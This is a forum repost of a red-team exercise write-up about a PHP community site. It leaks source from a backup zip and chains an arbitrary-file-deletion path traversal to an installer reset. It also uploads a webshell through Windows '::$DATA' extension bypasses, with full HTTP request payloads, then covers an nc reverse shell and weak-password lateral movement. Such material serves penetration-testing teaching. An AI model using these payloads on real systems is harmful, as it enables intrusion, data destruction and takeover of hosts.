安全矩阵

 找回密码
 立即注册
搜索
查看: 5103|回复: 0

报告,我已打入地方内部

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2021-2-24 00:07:58 | 显示全部楼层 |阅读模式
原文链接:报告,我已打入地方内部

事情是这样的,在某次省hw的时候,对目标进行打点的时候,发现ip下存在四个域名,在一个域名中发现了beifen.zip文件,而网址的功能是一个社区类型的网址。


下载后打开,发现是程序的源码,sql文件都在里面。




找程序中找到的数据库的ip、账号、密码等信息,试试能不能连接。





审计源码,发现漏洞既然连接不上,那么只能审计一下源码了,先拿工具扫一下。


经过查看,发现/application/index/controller/system/SystemUpgradeclient.php中的setcopydel方法可以任意提交参数。

可以看到以post方式接收了俩个参数,一个是id,一个是ids

if (is_array($post['ids'])) {
foreach ($post['ids'] as $file) {
$fileservice->del_dir(ROOT_PATH . 'public' . DS . 'copyfile' . $file);
}
}

if ($post['id']) {
$copyFile = ROOT_PATH . 'public' . DS . 'copyfile' . $post['id'];
// echo $copyFile;exit;
$fileservice->del_file($copyFile);
}
ids是需要数组的,然后拼接路径,传入$fileservice->del_dir()方法中。
id没有类型判断,直接拼接路径传入$fileservice->del_file()方法中。
那来看看这俩个方法中做了什么事情。
$fileservice->del_dir()方法是删除目录

删除目录,看来这是一个任意文件删除漏洞,分析下源码。
  1. static function del_dir($dirName)
  2. {
  3.     if (!file_exists($dirName)) # 判断文件或目录是否存在,不存在就返回false
  4.     {
  5.         return false;
  6.     }
  7.     $dir = opendir($dirName);   # 打开一个目录,读取它的内容
  8.     while ($fileName = readdir($dir))
  9.     {
  10.         $file = $dirName . '/' . $fileName;
  11.         if ($fileName != '.' && $fileName != '..')
  12.         {
  13.             if (is_dir($file))  # 判断是不是目录,是目录就在调用一次本身方法
  14.             {
  15.                 self::del_dir($file);
  16.             }
  17.             else
  18.             {
  19.                 unlink($file);  # 删除文件
  20.             }
  21.         }
  22.     }
  23.     closedir($dir);
  24.     return rmdir($dirName);     # 删除目录
  25. }
复制代码

$fileservice->del_file()方法是删除文件


这就没有什么好说的了,判断文件是否存在,然后删除。但是,这是hw啊,这漏洞什么用都没有啊,只能继续找其他漏洞了。

经过漫长的查找终于在\application\admin\controller\setting\SystemConfig.php中的发现了view_upload上传的方法。

这个方法中,type为3的时候是上传文件的,然后传入Upload::file方法。


但是在这个方法中判断了后缀名不能为php,但是在win的系统中,可以通过以下的一些方法绕过。
  1. .php.
  2. .php(空格)
  3. .php:1.jpg
  4. .php::$DATA
  5. .php::$DATA…….
  6. 等等、、、
复制代码

经过尝试,发现使用1.php:DATA这样的方式可以绕过,构造的post数据包为:
  1. POST /index.php/admin/setting.system_config/view_upload.html HTTP/1.1
  2. Host: xxx.com
  3. Content-Length: 403
  4. Cache-Control: max-age=0
  5. Origin: http://xxx.com
  6. Upgrade-Insecure-Requests: 1
  7. Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryP7jKNcoemK2sybZb
  8. User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
  9. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
  10. Referer: http://xxx.com/index.php/admin/setting.system_config/index_alone?tab_id=1
  11. Accept-Encoding: gzip, deflate
  12. Accept-Language: zh-CN,zh;q=0.9
  13. Cookie: PHPSESSID=es9ef1h1c9i0t21brcrlqigfmt
  14. Connection: close

  15. ------WebKitFormBoundaryP7jKNcoemK2sybZb
  16. Content-Disposition: form-data; name="file"

  17. site_logo
  18. ------WebKitFormBoundaryP7jKNcoemK2sybZb
  19. Content-Disposition: form-data; name="type"

  20. 3
  21. ------WebKitFormBoundaryP7jKNcoemK2sybZb
  22. Content-Disposition: form-data; name="site_logo"; filename="1.php::$DATA"
  23. Content-Type: image/png

  24. <?php
  25. phpinfo();
  26. ?>
复制代码

成功上传文件,但是这个文件上传需要后台登录才能上传,后台之前就已经爆破过了,没有爆破出来账号密码。但是这个程序有install文件,根据经验知道程序安装文件都会在安装后创建一个文件,来判断是否已经安装,所以在看看是否和我想的一样。


可以看到确实是生成了一个install.lock文件来判断是否安装成功,那么我们可以通过之前的任意文件删除漏洞来删除这个文件让系统进行重装。
但是这个删除文件,对系统进行重装,这就得问问裁判组能不能让了啊,经常协商,他们觉得这个程序不重要,在能保证不破坏程序的时候可以做。
既然他们说可以了,那么我就小心翼翼的构造一下post包,别真的给程序破坏了。

利用漏洞拿到shell删除install.lock文件的数据包:
  1. POST /index.php/admin/system.System_Upgradeclient/setcopydel HTTP/1.1
  2. Host: www.xxx.wang
  3. Content-Length: 26
  4. Cache-Control: max-age=0
  5. Upgrade-Insecure-Requests: 1
  6. Origin: http://www.xxx.wang
  7. Content-Type: application/x-www-form-urlencoded
  8. User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
  9. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  10. Referer: http://www.xxx.wang/index.php/admin/system.System_Upgradeclient/setcopydel
  11. Accept-Encoding: gzip, deflate
  12. Accept-Language: zh-CN,zh;q=0.9
  13. Cookie: PHPSESSID=8itmp7itfo1va6uu7bu0ouhgos
  14. Connection: close

  15. id=/../install/install.lock&ids=1
复制代码



返回值是成功的,看来没有问题,那就到重装系统的时候了,为了不对系统的数据造成破坏,我们对系统安装需要连接的mysql放到自己的服务器中。

成功登录后台,然后上传shell,还是之前的那个数据包,没有什么好说的,拿到shell后我用nc反弹一下,查看了系统上都有什么程序,发现这个系统上存在五个程序。

既然上来了,那就收集一下信息,然后把流量代理出去扫描一下,结果发现:

只是扫描了一下下而已,这个多弱口令,这稳了,通过这些弱口令在来做横向移动,一共拿下了近百台的机器,得了3600分。

报告,我已打入敌方内部!


















回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 20:45 , Processed in 0.013225 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表